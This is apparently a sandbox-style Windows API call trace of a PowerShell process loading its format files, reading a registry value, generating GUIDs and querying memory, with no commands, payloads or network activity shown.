	[0094.526] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.527] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.527] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.527] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.527] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.528] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.528] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.528] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.528] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.529] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.529] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.529] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.530] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.530] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0xe67, lpOverlapped=0x0) returned 1
	[0094.530] ReadFile (in: hFile=0x338, lpBuffer=0x3b49837, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b49837*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0094.530] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0094.530] SetErrorMode (uMode=0x1) returned 0x1
	[0094.531] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d400 | out: lpFileInformation=0x16d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0094.531] SetErrorMode (uMode=0x1) returned 0x1
	[0094.531] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4e8 | out: phkResult=0x16d4e8*=0x338) returned 0x0
	[0094.531] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d46c, lpData=0x0, lpcbData=0x16d468*=0x0 | out: lpType=0x16d46c*=0x1, lpData=0x0, lpcbData=0x16d468*=0x56) returned 0x0
	[0094.531] CoTaskMemAlloc (cb=0x5a) returned 0x2ed880
	[0094.531] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d43c, lpData=0x2ed880, lpcbData=0x16d438*=0x56 | out: lpType=0x16d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d438*=0x56) returned 0x0
	[0094.531] CoTaskMemFree (pv=0x2ed880) 
	[0094.531] RegCloseKey (hKey=0x338) returned 0x0
	[0094.535] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x8c06b87c, Data2=0x9926, Data3=0x4ea4, Data4=([0]=0x82, [1]=0xf6, [2]=0x3, [3]=0x19, [4]=0x1, [5]=0x6e, [6]=0xf3, [7]=0x51))) returned 0x0
	[0094.535] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xb1937062, Data2=0xf52a, Data3=0x40ee, Data4=([0]=0xa8, [1]=0xd8, [2]=0xe, [3]=0x87, [4]=0xc6, [5]=0x65, [6]=0xbf, [7]=0x20))) returned 0x0
	[0094.535] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x43aae878, Data2=0xf9cf, Data3=0x4e0e, Data4=([0]=0xab, [1]=0xa4, [2]=0x2, [3]=0x97, [4]=0x56, [5]=0x8e, [6]=0xb7, [7]=0xec))) returned 0x0
	[0094.535] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xa31f64, Data2=0xa156, Data3=0x444e, Data4=([0]=0x9a, [1]=0x9a, [2]=0x9d, [3]=0xe, [4]=0x8c, [5]=0xb2, [6]=0x70, [7]=0x3b))) returned 0x0
	[0094.535] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xf3265a79, Data2=0xf322, Data3=0x4859, Data4=([0]=0x98, [1]=0x38, [2]=0x9b, [3]=0xd, [4]=0xd0, [5]=0x78, [6]=0x46, [7]=0xc0))) returned 0x0
	[0094.536] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xc2541771, Data2=0xb9b1, Data3=0x4d62, Data4=([0]=0x85, [1]=0xc0, [2]=0x4, [3]=0xcb, [4]=0xec, [5]=0x15, [6]=0x53, [7]=0xa9))) returned 0x0
	[0094.536] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xb7549953, Data2=0x2293, Data3=0x4cd0, Data4=([0]=0xa7, [1]=0xf9, [2]=0x4d, [3]=0x35, [4]=0xe1, [5]=0x41, [6]=0xc3, [7]=0x41))) returned 0x0
	[0094.536] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.536] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xb326a009, Data2=0x1c24, Data3=0x4027, Data4=([0]=0x94, [1]=0x7c, [2]=0x57, [3]=0x8e, [4]=0xf1, [5]=0x8f, [6]=0x13, [7]=0x5a))) returned 0x0
	[0094.536] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x8ac4396c, Data2=0xdc92, Data3=0x4db2, Data4=([0]=0x8a, [1]=0xab, [2]=0xda, [3]=0x8d, [4]=0xd5, [5]=0x28, [6]=0xae, [7]=0x3f))) returned 0x0
	[0094.536] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xc5e15a79, Data2=0x4984, Data3=0x41c1, Data4=([0]=0xaa, [1]=0x7, [2]=0x43, [3]=0xea, [4]=0xf7, [5]=0xb4, [6]=0x72, [7]=0x1f))) returned 0x0
	[0094.605] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x991d599, Data2=0xd98c, Data3=0x4454, Data4=([0]=0xa9, [1]=0xcb, [2]=0xea, [3]=0xf4, [4]=0xdf, [5]=0xac, [6]=0x17, [7]=0x12))) returned 0x0
	[0094.605] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x3052d6a8, Data2=0x159d, Data3=0x485e, Data4=([0]=0x80, [1]=0xfa, [2]=0x4c, [3]=0x6e, [4]=0xa8, [5]=0x84, [6]=0xc3, [7]=0xa9))) returned 0x0
	[0094.606] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x4dccad37, Data2=0xb9c8, Data3=0x436f, Data4=([0]=0x8a, [1]=0xd, [2]=0x80, [3]=0xd, [4]=0xe9, [5]=0xe4, [6]=0xc4, [7]=0x44))) returned 0x0
	[0094.606] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xec4e713c, Data2=0x1103, Data3=0x465e, Data4=([0]=0x86, [1]=0x61, [2]=0xc4, [3]=0x8d, [4]=0x56, [5]=0xd4, [6]=0xf3, [7]=0x92))) returned 0x0
	[0094.606] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x44c702a1, Data2=0x3b83, Data3=0x4126, Data4=([0]=0xb0, [1]=0x2e, [2]=0x53, [3]=0xb6, [4]=0x9b, [5]=0x6c, [6]=0x84, [7]=0x45))) returned 0x0
	[0094.606] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x3081410a, Data2=0x56c, Data3=0x4e9c, Data4=([0]=0xb9, [1]=0x2a, [2]=0x45, [3]=0x6d, [4]=0xc2, [5]=0x40, [6]=0xe3, [7]=0xaa))) returned 0x0
	[0094.606] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xcdc36bc8, Data2=0x8a62, Data3=0x4b81, Data4=([0]=0x9a, [1]=0xd4, [2]=0x17, [3]=0x3b, [4]=0x45, [5]=0xea, [6]=0xd8, [7]=0xb8))) returned 0x0
	[0094.606] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xad0b2038, Data2=0xf98f, Data3=0x46e7, Data4=([0]=0x96, [1]=0xcc, [2]=0x57, [3]=0xfc, [4]=0xcb, [5]=0xd7, [6]=0xda, [7]=0xf3))) returned 0x0
	[0094.607] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xf413454b, Data2=0x3946, Data3=0x4c2f, Data4=([0]=0xb1, [1]=0x4, [2]=0xd1, [3]=0x8b, [4]=0xa1, [5]=0x77, [6]=0x9, [7]=0xf3))) returned 0x0
	[0094.607] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.607] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.607] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.608] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x1e7011b9, Data2=0x8f88, Data3=0x4ae3, Data4=([0]=0xbb, [1]=0x8, [2]=0xb4, [3]=0x5, [4]=0x71, [5]=0x56, [6]=0xe3, [7]=0x65))) returned 0x0
	[0094.608] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x57912e9e, Data2=0x348b, Data3=0x480a, Data4=([0]=0x95, [1]=0x56, [2]=0x39, [3]=0xab, [4]=0x37, [5]=0xc2, [6]=0xd, [7]=0xfd))) returned 0x0
	[0094.608] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xe9a7e0bd, Data2=0xe7a8, Data3=0x4521, Data4=([0]=0x93, [1]=0xb1, [2]=0x69, [3]=0x68, [4]=0xa4, [5]=0xa2, [6]=0x92, [7]=0x4))) returned 0x0
	[0094.608] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x446a176c, Data2=0xc0c4, Data3=0x4146, Data4=([0]=0x83, [1]=0x24, [2]=0x8, [3]=0x83, [4]=0xfc, [5]=0xbc, [6]=0x95, [7]=0xff))) returned 0x0
	[0094.608] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x45cb64ae, Data2=0x989d, Data3=0x4318, Data4=([0]=0x90, [1]=0x5a, [2]=0xcb, [3]=0xe9, [4]=0x6e, [5]=0x21, [6]=0x50, [7]=0x2a))) returned 0x0
	[0094.609] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xe18493ef, Data2=0x5b78, Data3=0x4ea6, Data4=([0]=0x9e, [1]=0x3b, [2]=0x86, [3]=0xc, [4]=0xd2, [5]=0xc4, [6]=0x3e, [7]=0xc0))) returned 0x0
	[0094.609] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x64b1c4a0, Data2=0xd5fc, Data3=0x4a21, Data4=([0]=0xbd, [1]=0x29, [2]=0x81, [3]=0x69, [4]=0xac, [5]=0xb1, [6]=0xa8, [7]=0xd8))) returned 0x0
	[0094.609] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xeca1455, Data2=0x9fc6, Data3=0x48a9, Data4=([0]=0xbb, [1]=0xdb, [2]=0xe9, [3]=0x22, [4]=0xc, [5]=0x8d, [6]=0xee, [7]=0x6))) returned 0x0
	[0094.609] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x582d6057, Data2=0x537b, Data3=0x4292, Data4=([0]=0x92, [1]=0x8a, [2]=0xf5, [3]=0x5c, [4]=0xc4, [5]=0x77, [6]=0xf1, [7]=0x9c))) returned 0x0
	[0094.609] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xf1986f, Data2=0x4241, Data3=0x4b65, Data4=([0]=0xb9, [1]=0xb9, [2]=0xa9, [3]=0xb8, [4]=0x7f, [5]=0x7b, [6]=0x24, [7]=0xaa))) returned 0x0
	[0094.609] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xeb27763f, Data2=0x7f92, Data3=0x4fef, Data4=([0]=0x80, [1]=0x6e, [2]=0x2d, [3]=0xa4, [4]=0xb0, [5]=0x4d, [6]=0x57, [7]=0xb5))) returned 0x0
	[0094.610] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xbac523f0, Data2=0x6478, Data3=0x471f, Data4=([0]=0x96, [1]=0xc7, [2]=0x30, [3]=0xb4, [4]=0x24, [5]=0x8a, [6]=0x1d, [7]=0x93))) returned 0x0
	[0094.610] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x1e9153a3, Data2=0x432d, Data3=0x49ee, Data4=([0]=0x9d, [1]=0xb9, [2]=0x49, [3]=0xb0, [4]=0xdc, [5]=0xe3, [6]=0x11, [7]=0x1d))) returned 0x0
	[0094.610] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.610] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xadd99120, Data2=0x3d9, Data3=0x4fcc, Data4=([0]=0xa0, [1]=0x12, [2]=0xf5, [3]=0x65, [4]=0x9d, [5]=0xb6, [6]=0x31, [7]=0xd8))) returned 0x0
	[0094.610] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.612] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.613] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xc3c5788a, Data2=0xfbb7, Data3=0x4fec, Data4=([0]=0x9b, [1]=0xef, [2]=0xdf, [3]=0xf4, [4]=0xda, [5]=0x17, [6]=0x6a, [7]=0x27))) returned 0x0
	[0094.613] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.614] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x7832f002, Data2=0x1f13, Data3=0x48d1, Data4=([0]=0xa2, [1]=0xc3, [2]=0x75, [3]=0x62, [4]=0x89, [5]=0x9e, [6]=0x82, [7]=0xe9))) returned 0x0
	[0094.614] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xdf23225c, Data2=0x202f, Data3=0x46c5, Data4=([0]=0xaf, [1]=0xc4, [2]=0x82, [3]=0x3c, [4]=0xd2, [5]=0x64, [6]=0x27, [7]=0x35))) returned 0x0
	[0094.614] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x2179ea9, Data2=0x8606, Data3=0x464c, Data4=([0]=0x84, [1]=0x77, [2]=0x30, [3]=0xa7, [4]=0xe4, [5]=0x58, [6]=0xd2, [7]=0xbc))) returned 0x0
	[0094.614] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xbececb22, Data2=0x2a58, Data3=0x44e6, Data4=([0]=0xb3, [1]=0xc1, [2]=0xed, [3]=0xef, [4]=0x19, [5]=0xba, [6]=0xf7, [7]=0x2d))) returned 0x0
	[0094.617] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x8ecc8e3f, Data2=0x3570, Data3=0x4552, Data4=([0]=0xb1, [1]=0x73, [2]=0xdb, [3]=0x99, [4]=0x32, [5]=0xd5, [6]=0xce, [7]=0xf5))) returned 0x0
	[0094.617] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x7aba79c, Data2=0xedf3, Data3=0x41bf, Data4=([0]=0xbd, [1]=0xa2, [2]=0xa0, [3]=0xee, [4]=0x1b, [5]=0xce, [6]=0x97, [7]=0x45))) returned 0x0
	[0094.617] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xd766a26c, Data2=0x2e2f, Data3=0x41d3, Data4=([0]=0x81, [1]=0xbd, [2]=0x62, [3]=0x6, [4]=0xd2, [5]=0x26, [6]=0x3b, [7]=0x60))) returned 0x0
	[0094.617] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.618] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x8f69c9a6, Data2=0x3a06, Data3=0x43d1, Data4=([0]=0x97, [1]=0x22, [2]=0x8d, [3]=0x87, [4]=0x95, [5]=0x41, [6]=0x25, [7]=0x25))) returned 0x0
	[0094.618] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xa36fe6e2, Data2=0x9f95, Data3=0x4a2f, Data4=([0]=0x97, [1]=0x82, [2]=0x8f, [3]=0x53, [4]=0xa, [5]=0x65, [6]=0xad, [7]=0xd3))) returned 0x0
	[0094.618] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xdd2f56cc, Data2=0xdd09, Data3=0x4d02, Data4=([0]=0xab, [1]=0x4d, [2]=0xce, [3]=0x56, [4]=0xc4, [5]=0x80, [6]=0x5e, [7]=0x50))) returned 0x0
	[0094.618] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x631e9736, Data2=0xd4fa, Data3=0x41a3, Data4=([0]=0x96, [1]=0x96, [2]=0x88, [3]=0x9d, [4]=0x6a, [5]=0xd0, [6]=0xf1, [7]=0x78))) returned 0x0
	[0094.618] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x52f41800, Data2=0x56d8, Data3=0x4d87, Data4=([0]=0x8f, [1]=0x43, [2]=0x1e, [3]=0x22, [4]=0x73, [5]=0x79, [6]=0x44, [7]=0x8))) returned 0x0
	[0094.619] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.619] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xb54170bf, Data2=0x6803, Data3=0x4ab7, Data4=([0]=0xba, [1]=0xf, [2]=0xef, [3]=0x89, [4]=0x57, [5]=0xe2, [6]=0xb, [7]=0x9f))) returned 0x0
	[0094.619] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x79609c42, Data2=0x53b, Data3=0x4cce, Data4=([0]=0x83, [1]=0x3c, [2]=0xe3, [3]=0x80, [4]=0xa9, [5]=0xb0, [6]=0x93, [7]=0x97))) returned 0x0
	[0094.619] VirtualQuery (in: lpAddress=0x16c130, lpBuffer=0x16cff0, dwLength=0x30 | out: lpBuffer=0x16cff0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.619] VirtualQuery (in: lpAddress=0x16c130, lpBuffer=0x16cff0, dwLength=0x30 | out: lpBuffer=0x16cff0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.619] VirtualQuery (in: lpAddress=0x16c130, lpBuffer=0x16cff0, dwLength=0x30 | out: lpBuffer=0x16cff0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.619] VirtualQuery (in: lpAddress=0x16c130, lpBuffer=0x16cff0, dwLength=0x30 | out: lpBuffer=0x16cff0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.620] SetErrorMode (uMode=0x1) returned 0x1
	[0094.620] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0094.620] SetErrorMode (uMode=0x1) returned 0x1
	[0094.620] GetFileType (hFile=0x338) returned 0x1
	[0094.620] ReadFile (in: hFile=0x338, lpBuffer=0x3ca8200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3ca8200*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.621] ReadFile (in: hFile=0x338, lpBuffer=0x3ca8200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3ca8200*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.622] ReadFile (in: hFile=0x338, lpBuffer=0x3ca8200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3ca8200*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.622] ReadFile (in: hFile=0x338, lpBuffer=0x3ca8200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3ca8200*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.622] ReadFile (in: hFile=0x338, lpBuffer=0x3ca8200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3ca8200*, lpNumberOfBytesRead=0x16d458*=0x8b4, lpOverlapped=0x0) returned 1
	[0094.622] ReadFile (in: hFile=0x338, lpBuffer=0x3ca761c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3ca761c*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0094.622] ReadFile (in: hFile=0x338, lpBuffer=0x3ca8200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3ca8200*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0094.623] SetErrorMode (uMode=0x1) returned 0x1
	[0094.623] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d400 | out: lpFileInformation=0x16d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0094.623] SetErrorMode (uMode=0x1) returned 0x1
